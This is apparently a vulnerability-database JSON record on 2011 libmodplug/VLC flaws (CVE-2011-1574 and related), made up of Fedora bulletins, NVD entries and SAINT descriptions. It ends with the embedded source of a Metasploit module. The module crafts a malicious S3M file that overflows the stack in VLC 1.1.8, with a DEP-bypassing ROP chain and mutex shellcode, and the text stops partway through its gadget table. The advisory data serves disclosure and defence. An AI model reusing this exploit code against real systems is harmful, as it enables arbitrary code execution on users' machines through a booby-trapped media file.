"AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1574"], "description": "Modplug mod music file format library. 
", "modified": "2011-04-17T21:24:11", "published": "2011-04-17T21:24:11", "id": "FEDORA:73F37110CA6", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 14 Update: libmodplug-0.8.8.2-1.fc14", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1574", "CVE-2011-1761"], "description": "Modplug mod music file format library. ", "modified": "2011-05-25T02:24:12", "published": "2011-05-25T02:24:12", "id": "FEDORA:0F99C110FD5", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 14 Update: libmodplug-0.8.8.3-3.fc14", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2020-12-09T19:39:09", "description": "Stack-based buffer overflow in the CSoundFile::ReadS3M function in src/load_s3m.cpp in libmodplug before 0.8.8.4 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted S3M file with an invalid offset.", "edition": 5, "cvss3": {}, "published": "2012-06-07T19:55:00", "title": "CVE-2011-2912", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2912"], "modified": "2017-08-29T01:29:00", "cpe": ["cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.3", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.2", "cpe:/a:konstanty_bialkowski:libmodplug:0.8", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.4", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.7", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.6", 
"cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.1", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.5", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8"], "id": "CVE-2011-2912", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2912", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.4:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:39:09", "description": "Off-by-one error in the CSoundFile::ReadAMS2 function in src/load_ams.cpp in libmodplug before 0.8.8.4 allows remote attackers to cause a denial of service (memory corruption) and possibly execute arbitrary code via a crafted AMS file with a large number of instruments.", "edition": 5, "cvss3": {}, "published": "2012-06-07T19:55:00", "title": "CVE-2011-2915", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2915"], "modified": "2017-08-29T01:29:00", "cpe": ["cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.3", 
"cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.2", "cpe:/a:konstanty_bialkowski:libmodplug:0.8", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.4", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.7", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.6", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.1", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.5", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8"], "id": "CVE-2011-2915", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2915", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.4:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:39:09", "description": "Off-by-one error in the CSoundFile::ReadAMS function in src/load_ams.cpp in libmodplug before 0.8.8.4 allows remote attackers to cause a denial of service (stack memory corruption) and possibly execute arbitrary code via a crafted AMS file with a large number of samples.", "edition": 5, "cvss3": {}, "published": "2012-06-07T19:55:00", "title": "CVE-2011-2913", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2913"], "modified": "2017-08-29T01:29:00", "cpe": ["cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.3", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.2", "cpe:/a:konstanty_bialkowski:libmodplug:0.8", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.4", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.7", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.6", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.1", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.5", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8"], "id": "CVE-2011-2913", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2913", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.4:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:39:09", "description": "Integer overflow in the CSoundFile::ReadWav function in src/load_wav.cpp in libmodplug before 0.8.8.4 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted WAV file, which triggers a heap-based buffer overflow.", "edition": 5, "cvss3": {}, "published": "2012-06-07T19:55:00", "title": "CVE-2011-2911", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, 
"cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2911"], "modified": "2017-08-29T01:29:00", "cpe": ["cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.3", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.2", "cpe:/a:konstanty_bialkowski:libmodplug:0.8", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.4", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.7", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.6", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.1", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.5", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8"], "id": "CVE-2011-2911", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2911", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.4:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:39:09", "description": "Off-by-one error in the CSoundFile::ReadDSM function in src/load_dms.cpp in libmodplug before 0.8.8.4 allows remote attackers to cause a denial of service (memory corruption) and possibly execute arbitrary code via a crafted DSM file with a large number of samples.", "edition": 5, "cvss3": {}, "published": "2012-06-07T19:55:00", "title": 
"CVE-2011-2914", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2914"], "modified": "2017-08-29T01:29:00", "cpe": ["cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.3", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.2", "cpe:/a:konstanty_bialkowski:libmodplug:0.8", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.4", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.7", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.6", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.1", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.5", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8"], "id": "CVE-2011-2914", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-2914", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.4:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:39:06", "description": "Stack-based buffer overflow in the ReadS3M method in load_s3m.cpp in libmodplug before 0.8.8.2 allows remote 
attackers to execute arbitrary code via a crafted S3M file.", "edition": 5, "cvss3": {}, "published": "2011-05-09T22:55:00", "title": "CVE-2011-1574", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1574"], "modified": "2016-12-08T03:01:00", "cpe": ["cpe:/a:konstanty_bialkowski:libmodplug:0.8", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.4", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.7", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.6", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8.1", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.5", "cpe:/a:konstanty_bialkowski:libmodplug:0.8.8"], "id": "CVE-2011-1574", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1574", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:konstanty_bialkowski:libmodplug:0.8.4:*:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2016-10-03T15:02:01", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1574"], "description": "Added: 05/26/2011 \nCVE: [CVE-2011-1574](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1574>) \nOSVDB: 
[72143](<http://www.osvdb.org/72143>) \n\n\n### Background\n\n[VideoLAN VLC media player](<http://www.videolan.org/vlc/>) is a media player supporting various audio and video formats for multiple platforms. \n\n### Problem\n\nVLC media player is vulnerable to a stack buffer overflow because the ReadS3M() function in libmodplug fails to properly sanitize user-supplied input. A remote attacker who entices a user to open a specially crafted file in the vulnerable VLC media player could potentially execute arbitrary code. \n\n### Resolution\n\n[Upgrade](<http://www.videolan.org/vlc/>) to [VLC 1.1.9](<http://www.videolan.org/vlc/releases/1.1.9.html>) or higher. \n\n### References\n\n<http://secunia.com/advisories/44054/> \n\n\n### Limitations\n\nExploit runs on VideoLAN VLC media player 1.1.8. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2011-05-26T00:00:00", "published": "2011-05-26T00:00:00", "id": "SAINT:114116FE009CEA3405415E74B271E604", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/vlc_libmodplug_reads3m", "type": "saint", "title": "VLC Media Player Libmodplug CSoundFile::ReadS3M() Function S3M File Handling Overflow", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T17:19:51", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1574"], "edition": 2, "description": "Added: 05/26/2011 \nCVE: [CVE-2011-1574](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1574>) \nOSVDB: [72143](<http://www.osvdb.org/72143>) \n\n\n### Background\n\n[VideoLAN VLC media player](<http://www.videolan.org/vlc/>) is a media player supporting various audio and video formats for multiple platforms. \n\n### Problem\n\nVLC media player is vulnerable to a stack buffer overflow because the ReadS3M() function in libmodplug fails to properly sanitize user-supplied input. 
A remote attacker who entices a user to open a specially crafted file in the vulnerable VLC media player could potentially execute arbitrary code. \n\n### Resolution\n\n[Upgrade](<http://www.videolan.org/vlc/>) to [VLC 1.1.9](<http://www.videolan.org/vlc/releases/1.1.9.html>) or higher. \n\n### References\n\n<http://secunia.com/advisories/44054/> \n\n\n### Limitations\n\nExploit runs on VideoLAN VLC media player 1.1.8. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2011-05-26T00:00:00", "published": "2011-05-26T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/vlc_libmodplug_reads3m", "id": "SAINT:B21ACF2EB9B8F35B9EB742A262AFFAD0", "type": "saint", "title": "VLC Media Player Libmodplug CSoundFile::ReadS3M() Function S3M File Handling Overflow", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-04T23:19:38", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1574"], "description": "Added: 05/26/2011 \nCVE: [CVE-2011-1574](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1574>) \nOSVDB: [72143](<http://www.osvdb.org/72143>) \n\n\n### Background\n\n[VideoLAN VLC media player](<http://www.videolan.org/vlc/>) is a media player supporting various audio and video formats for multiple platforms. \n\n### Problem\n\nVLC media player is vulnerable to a stack buffer overflow because the ReadS3M() function in libmodplug fails to properly sanitize user-supplied input. A remote attacker who entices a user to open a specially crafted file in the vulnerable VLC media player could potentially execute arbitrary code. \n\n### Resolution\n\n[Upgrade](<http://www.videolan.org/vlc/>) to [VLC 1.1.9](<http://www.videolan.org/vlc/releases/1.1.9.html>) or higher. \n\n### References\n\n<http://secunia.com/advisories/44054/> \n\n\n### Limitations\n\nExploit runs on VideoLAN VLC media player 1.1.8. 
\n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2011-05-26T00:00:00", "published": "2011-05-26T00:00:00", "id": "SAINT:ECB5BDC1AA42880516325F32A021D963", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/vlc_libmodplug_reads3m", "title": "VLC Media Player Libmodplug CSoundFile::ReadS3M() Function S3M File Handling Overflow", "type": "saint", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T07:30:41", "description": "VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow. CVE-2011-1574. Remote exploit for windows platform", "published": "2011-04-08T00:00:00", "type": "exploitdb", "title": "VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1574"], "modified": "2011-04-08T00:00:00", "id": "EDB-ID:17252", "href": "https://www.exploit-db.com/exploits/17252/", "sourceData": "##\r\n# $Id: vlc_modplug_s3m.rb 12282 2011-04-08 15:48:53Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits an input validation error in libmod_plugin as\r\n\t\t\t\tincluded with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9\r\n\t\t\t\tare affected. 
By creating a malicious S3M file, a remote attacker\r\n\t\t\t\tcould execute arbitrary code.\r\n\r\n\t\t\t\tAlthough other products that bundle libmodplug may be vulnerable, this\r\n\t\t\t\tmodule was only tested against VLC.\r\n\r\n\t\t\t\tNOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to\r\n\t\t\t\tpermanently enable NX support on machines that support it. As such,\r\n\t\t\t\tthis module is capable of bypassing DEP, but not ASLR.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => [ 'jduck' ],\r\n\t\t\t'Version' => '$Revision: 12282 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2011-1574' ],\r\n\t\t\t\t\t[ 'OSVDB', '72143' ],\r\n\t\t\t\t\t#[ 'BID', 'xxx' ],\r\n\t\t\t\t\t[ 'URL', 'http://modplug-xmms.git.sourceforge.net/git/gitweb.cgi?p=modplug-xmms/modplug-xmms;a=commitdiff;h=aecef259828a89bb00c2e6f78e89de7363b2237b' ],\r\n\t\t\t\t\t[ 'URL', 'http://hackipedia.org/File%20formats/Music/html/s3mformat.php' ],\r\n\t\t\t\t\t[ 'URL', 'https://www.sec-consult.com/files/20110407-0_libmodplug_stackoverflow.txt' ],\r\n\t\t\t\t\t[ 'URL', 'http://seclists.org/fulldisclosure/2011/Apr/113' ]\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space'\t\t=> 512 - 0x24, # Space reserved for prepended mutex code\r\n\t\t\t\t\t#'DisableNops'\t=> true,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'VLC 1.1.8 on Windows XP SP3',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t# vuln is in libmod_plugin.dll, rop is custom to this module\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Apr 07, 2011', # \"found: 2011-03-09\"\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', 'msf.s3m']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tnum_orders = 0x14\r\n\t\tnum_instru = 0x15\r\n\t\tnum_patterns = 0x18\r\n\r\n\t\thdr = \"\\x00\" * 0x1c 
# song name (none)\r\n\t\thdr << [\r\n\t\t\t0x1a, # static byte\r\n\t\t\t0x10, # ST3 module\r\n\t\t\t0x00, # padding\r\n\t\t\tnum_orders,\r\n\t\t\tnum_instru,\r\n\t\t\tnum_patterns,\r\n\t\t\t0x00, # Flags\r\n\t\t\t0x1320, # Created with (which tracker)\r\n\t\t\t0x02, # File format information\r\n\t\t].pack('CCvvvvvvv')\r\n\t\thdr << \"SCRM\"\r\n\r\n\t\thdr << [\r\n\t\t\t0x40, # global volume\r\n\t\t\t0x06, # initial speed\r\n\t\t\t0x8a, # initial tempo\r\n\t\t\t0xb0, # master volume\r\n\t\t\t0x10, # ultra click removal\r\n\t\t\t0xfb # NOTE, non-0xfc value skips an additional loop!\r\n\t\t\t# 0xfc == default channel pan positions present\r\n\t\t].pack('CCCCCC')\r\n\t\thdr << \"\\x00\" * 10 # includes pad and special pointer\r\n\r\n\t\t# channel settings (for 32 channels)\r\n\t\thdr << \"\\x00\\x08\\x01\\x09\\x02\\x0a\\x03\\x0b\\x04\\x0c\\x05\\x0d\\x06\\x0e\\x07\\x0f\"\r\n\t\thdr << \"\\xff\" * 16\r\n\r\n\t\t# orders\r\n\t\thdr << \"\\x07\\x08\\x0c\\x09\\x0a\\x0b\\x0b\\x0d\\x0e\\x0f\\x0f\\x0f\\x10\\x11\\x12\\x13\"\r\n\t\thdr << \"\\x14\\x16\\x17\\xff\"\r\n\r\n\t\t# parapointers to instruments\r\n\t\thdr << [ 0x0f ].pack('v') * num_instru\r\n\r\n\t\t# parapoitners to patterns\r\n\t\thdr << [ 0x78 ].pack('v') * num_patterns\r\n\r\n\t\t# channel default pan positions\r\n\t\thdr << \"\\x00\" * 32\r\n\r\n\t\t# instruments\r\n\t\tinstru = \"\\x01metasplo.ity\"\r\n\t\trest = \"\\x00\" * ((0x50 * num_instru) - instru.length)\r\n\r\n\t\t# Build the rop stack\r\n\t\trvas = rvas_libmod_plugin_xpsp3()\r\n\t\trop = generate_rop(rvas)\r\n\t\tzero_ptr = rva2addr(rvas, 'Scratch') + 4\r\n\t\tmutex_addr = rva2addr(rvas, 'Scratch') + 8\r\n\t\timp_Sleep = rva2addr(rvas, 'imp_Sleep')\r\n\r\n\t\t# A mutex to prevent double payloads\r\n\t\tlocking_code = <<-EOS\r\n\tmov ebx, [ #{imp_Sleep} ]\r\n\tjmp test_lock\r\n\r\nsleep:\r\n\tpush 0xdeadbeef\r\n\tcall ebx\r\n\r\ntest_lock:\r\n\tmov eax, [ #{mutex_addr} ]\r\n\ttest eax,eax\r\n\tjnz sleep\r\n\r\n\tlock cmpxchg [ #{mutex_addr} ], 
ebp\r\n\ttest eax,eax\r\n\tjnz sleep\r\n\r\nEOS\r\n\t\trop << Metasm::Shellcode.assemble(Metasm::Ia32.new, locking_code).encode_string\r\n\t\trop << payload.encoded\r\n\r\n\t\t# This becomes the new EIP (after return)\r\n\t\tret = rva2addr(rvas, 'pop eax / ret')\r\n\t\trest[1267, 4] = [ ret ].pack('V')\r\n\r\n\t\t# In order to force return, we smash the this ptr on the stack and point\r\n\t\t# it so that m_nChannels turns out to be 0.\r\n\t\trest[1271, 4] = [ zero_ptr - 0xe910 ].pack('V')\r\n\r\n\t\t# Add the ROP stack and final payload here\r\n\t\trest[1275, rop.length] = rop\r\n\t\tinstru << rest\r\n\r\n\t\t# patterns\r\n\t\tpatt = [ 0x10 ].pack('v')\r\n\t\tpatt << \"\\x00\" * 0x10\r\n\r\n\r\n\t\t# finalize the file\r\n\t\ts3m = \"\"\r\n\t\ts3m << hdr\r\n\r\n\t\tinstru_pad = (0x0f * 0x10) - hdr.length\r\n\t\ts3m << \"\\x80\" * instru_pad\r\n\t\ts3m << instru\r\n\r\n\r\n\t\t# patch in exploit trigger values\r\n\t\ts3m[0x22, 2] = [ 0x220 ].pack('v')\r\n\t\ts3m[0x24, 2] = [ 0x220 ].pack('v')\r\n\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n\r\n\t\tfile_create(s3m)\r\n\r\n\tend\r\n\r\n\tdef rvas_libmod_plugin_xpsp3()\r\n\t\t# libmod_plugin.dll from VLC 1.1.8 (Win32)\r\n\t\t# Just return this hash\r\n\t\t{\r\n\t\t\t# Used as 'Ret' for target\r\n\t\t\t'ret' => 0x1022,\r\n\t\t\t'push eax / ret' => 0x1cc4d,\r\n\t\t\t'pop eax / ret' => 0x598a2,\r\n\t\t\t'mov eax, [eax+0x1c] / ret' => 0x542c9,\r\n\t\t\t'pop ebx / pop ebp / ret' => 0x25e2f,\r\n\t\t\t'add eax, 4 / pop ebp / ret' => 0x7028,\r\n\t\t\t'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / ret' => 0x23dad,\r\n\t\t\t'sub eax, ebx / pop ebx / pop edi / pop ebp 